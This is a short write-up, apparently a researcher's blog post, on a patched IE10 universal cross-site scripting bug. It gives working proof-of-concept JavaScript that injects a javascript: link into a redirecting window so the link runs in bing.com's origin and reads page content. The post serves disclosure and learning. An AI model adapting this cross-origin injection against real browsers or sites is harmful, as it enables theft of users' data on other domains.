This is a clean, straightforward UXSS. Before a server redirect completes, the parent window can inject a javascript: protocol anchor into the new window’s document and click it programmatically. The click fires later, in the context of the redirected domain.

function main() {
    var win = window.open("redirect.aspx", "", "width=400,height=400");

    var evilLink = win.document.createElement("a");
    evilLink.setAttribute('onclick', 'alert("Click OK when Bing is loaded...")');
    evilLink.setAttribute('href', 'javascript:alert(document.URL + "\n\n" + document.body.innerText)');

    win.document.appendChild(evilLink); // Inject the javascript link
    evilLink.click(); // This will execute in the context of bing.com
}

The onclick alert pauses execution long enough for the redirect to complete, so by the time the user dismisses it Bing has loaded and the href javascript executes in Bing’s origin. Tested on Win8 RTM IE10 Desktop and Modern UI.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.